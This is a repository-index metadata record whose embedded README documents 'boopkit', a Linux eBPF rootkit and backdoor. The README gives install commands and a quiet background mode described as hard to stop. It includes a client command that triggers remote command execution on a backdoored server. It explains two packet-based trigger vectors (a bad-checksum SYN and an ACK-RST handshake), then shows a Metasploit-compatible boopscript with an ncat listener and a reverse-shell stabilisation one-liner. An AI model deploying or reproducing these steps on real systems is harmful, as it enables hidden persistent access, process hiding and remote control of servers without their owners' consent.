{"id":13812663,"url":"https://github.com/krisnova/boopkit","last_synced_at":"2025-05-16T03:03:00.094Z","repository":{"id":37749710,"uuid":"475870202","full_name":"krisnova/boopkit","owner":"krisnova","description":"Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin.","archived":false,"fork":false,"pushed_at":"2023-10-19T07:43:18.000Z","size":909,"stargazers_count":1601,"open_issues_count":13,"forks_count":178,"subscribers_count":31,"default_branch":"main","last_synced_at":"2025-04-08T13:08:39.304Z","etag":null,"topics":["ebpf","linux-kernel-hacking","security","tcp"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/krisnova.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-03-30T12:33:29.000Z","updated_at":"2025-04-07T02:07:52.000Z","dependencies_parsed_at":"2024-08-04T04:02:43.997Z","dependency_job_id":"8d68e2d9-10be-4eac-b28c-84455bed0b52","html_url":"https://github.com/krisnova/boopkit","commit_stats":null,"previous_names":[],"tags_count":9,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/krisnova%2Fboopkit/manifests","owner_url":"https://repos.ecos
yste.ms/api/v1/hosts/GitHub/owners/krisnova","download_url":"https://codeload.github.com/krisnova/boopkit/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254459083,"owners_count":22074604,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ebpf","linux-kernel-hacking","security","tcp"],"created_at":"2024-08-04T04:00:54.280Z","updated_at":"2025-05-16T03:02:55.079Z","avatar_url":"https://github.com/krisnova.png","language":"C","funding_links":[],"categories":["By Industry","C"],"sub_categories":["Security"],"readme":"```\n================================================================\n\n    ██████╗  ██████╗  ██████╗ ██████╗ ██╗  ██╗██╗████████╗\n    ██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗██║ ██╔╝██║╚══██╔══╝\n    ██████╔╝██║   ██║██║   ██║██████╔╝█████╔╝ ██║   ██║   \n    ██╔══██╗██║   ██║██║   ██║██╔═══╝ ██╔═██╗ ██║   ██║   \n    ██████╔╝╚██████╔╝╚██████╔╝██║     ██║  ██╗██║   ██║   \n    ╚═════╝  ╚═════╝  ╚═════╝ ╚═╝     ╚═╝  ╚═╝╚═╝   ╚═╝   \n    Author: Kris Nóva \u003ckris@nivenly.com\u003e Version 1.4.0\n    \n    IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE \n    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, \n    EXEMPLARY, OR CONSEQUENTIAL DAMAGES.    
\n\n    DO NOT ATTEMPT TO USE THE TOOLS TO VIOLATE THE LAW.\n    THE AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTION.\n    MISUSE OF THE SOFTWARE, INFORMATION, OR SOURCE CODE\n    MAY RESULT IN CRIMINAL CHARGES.\n    \n    Use at your own risk.\n\n================================================================\n\nBoopkit.\nLinux rootkit and backdoor. Built using eBPF.\n\nUsage: \nboopkit [options]\n\nOptions:\n-h, help           Display help and usage for boopkit.\n-i, interface      Interface name. lo, eth0, wlan0, etc\n-s, sudo-bypass    Bypass sudo check. Breaks PID obfuscation.\n-r, reverse-conn   Attempt a reverse RCE lookup if no payload found.\n-q, quiet          Disable output.\n-x, reject         Source addresses to reject triggers from.\n\n```\n\nLinux backdoor, rootkit, and eBPF bypass tools.\nRemote command execution over raw TCP.\n\n - Tested on Linux kernel 5.16\n - Tested on Linux kernel 5.17\n - Remote code execution over TCP (SSH, Nginx, Kubernetes, etc)\n - Network gateway bypass (bad checksums, TCP reset)\n - Self obfuscation at runtime (eBPF process hiding)\n\n##### Disclaimer\n\n\u003e This is **NOT** an exploit! This requires prior privileged access on a server in order to work!\n\u003e I am a professional security researcher. These are white hat tools used for research purposes only.\n\u003e Use this responsibly. Never use this software illegally.\n\n![FSpgEXTacAYme8t](https://user-images.githubusercontent.com/13757818/168698377-9c1125d6-698d-4009-a599-56b275b54764.jpeg)\n\n## Server Side\n\nDownload and build boopkit.\n\n```bash\nwget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz\ntar -xzf v1.3.0.tar.gz \ncd boopkit-1.3.0/\nmake\nsudo make install\n```\n\nRun boopkit in the foreground. \n\n```bash \n# Reject all boops on localhost and 10.0.0.1\nboopkit -x 127.0.0.1 -x 10.0.0.1\n```\n\nRun boopkit in the background in quiet mode.\n\n```bash \n# Danger! This can be VERY hard to stop! 
Run this at your own risk!\nboopkit -q \u0026\n```\n\nBoopkit is now running and can be exploited using the client `boopkit-boop` command line tool.\n\n## Client Side\n\nDownload and build boopkit.\n\n```bash\nwget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz\ntar -xzf v1.2.0.tar.gz \ncd boopkit-1.2.0/\nmake\nsudo make install\n```\nRun boopkit-boop against the server.\n\n```bash \n# ===================\nRCE=\"ls -la\"\n# ===================\nLHOST=\"127.0.0.1\"\nLPORT=\"3535\"\nRHOST=\"127.0.0.1\"\nRPORT=\"22\"\nboopkit-boop \\\n  -lhost $LHOST \\\n  -lport $LPORT \\\n  -rhost $RHOST \\\n  -rport $RPORT \\\n  -c \"$RCE\"\n```\n\n# Boop Vectors\n\nBoopkit will respond to various events on the network. Both of which can be triggered with the `boopkit-boop` tool.\n\nTCP Header Format. Taken from [RFC 793](https://datatracker.ietf.org/doc/html/rfc793#section-3.1). September 1981\n```\n        0                   1                   2                   3\n        0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n       |          Source Port          |       Destination Port        |\n       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n       |                        Sequence Number                        |\n       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n       |                    Acknowledgment Number                      |\n       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n       |  Data |           |U|A|P|R|S|F|                               |\n       | Offset| Reserved  |R|C|S|S|Y|I|            Window             |\n       |       |           |G|K|H|T|N|N|                               |\n       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n       |           Checksum            |         Urgent Pointer        |\n       
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n       |                    Options                    |    Padding    |\n       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n       {                             data                              }\n       {                             ....                              }\n       {                             data                              }\n       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n```\n\n### 1. Bad Checksum\n\nFirst the `boopkit-boop` tool will send a malformed TCP SYN packet with an empty checksum to the server over a `SOCK_RAW` socket. This will trigger `boopkit` remotely regardless of what TCP services are running. This works against any Linux server running boopkit, regardless of the state of TCP services.\n\nUse `-p` with `boopkit-boop` to only use this first vector.\n\n⚠️ Some modern network hardware will DROP all malformed checksum packets such as the one required to exploit boopkit using this vector!\n\n### 2. Sending ACK-RST packet\n\nNext the `boopkit-boop` tool will complete a valid TCP handshake with a `SOCK_STREAM` socket against a remote TCP service such as SSH, Kubernetes, Nginx, etc. 
After the initial TCP handshake is complete, `boopkit-boop` will repeat the process a 2nd time.\nThe 2nd handshake will flip the TCP reset flag in the packet, triggering a TCP reset on the server.\n\nEither of these tactics is enough to independently trigger boopkit.\nVarious network hardware and runtime conditions will make either tactic more viable.\nBoopkit will try both, and respond to both by default.\n\n# Boopscript\n\nThe `boopscript` file is a [Metasploit](https://github.com/rapid7/metasploit-framework) compatible script that can be used to remotely trigger the boopkit backdoor after `boopkit-boop` is installed on a remote Linux machine.\n\n```bash\n# boopscript\nRHOST=\"127.0.0.1\"\nRPORT=\"22\"\nLHOST=\"127.0.0.1\"\nLPORT=\"3535\"\n\nNCAT=\"/usr/bin/ncat\"\nNCATLISTENPORT=\"3545\"\n```\n\n### Compile Time Dependencies \n\n - 'clang' \n - 'bpftool'   Required for `libbpf`\n - 'xdp-tools' Required for `libxdp`\n - 'llvm'\n - 'pcap'\n - 'lib32-glibc'\n\n### Reverse Shell Stabilization\n\n```bash\npython -c \"import pty; pty.spawn('/bin/bash')\"\n```\n\n### References\n\n - [Tracepoints with BPF](https://lwn.net/Articles/683504/)\n - [Raw TCP Sockets](https://github.com/MaxXor/raw-sockets-example)\n - [Bad BPF](https://github.com/pathtofile/bad-bpf)\n\nCredit to the original authors for their helpful code samples! I forked a lot of code for this project! \n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkrisnova%2Fboopkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkrisnova%2Fboopkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkrisnova%2Fboopkit/lists"}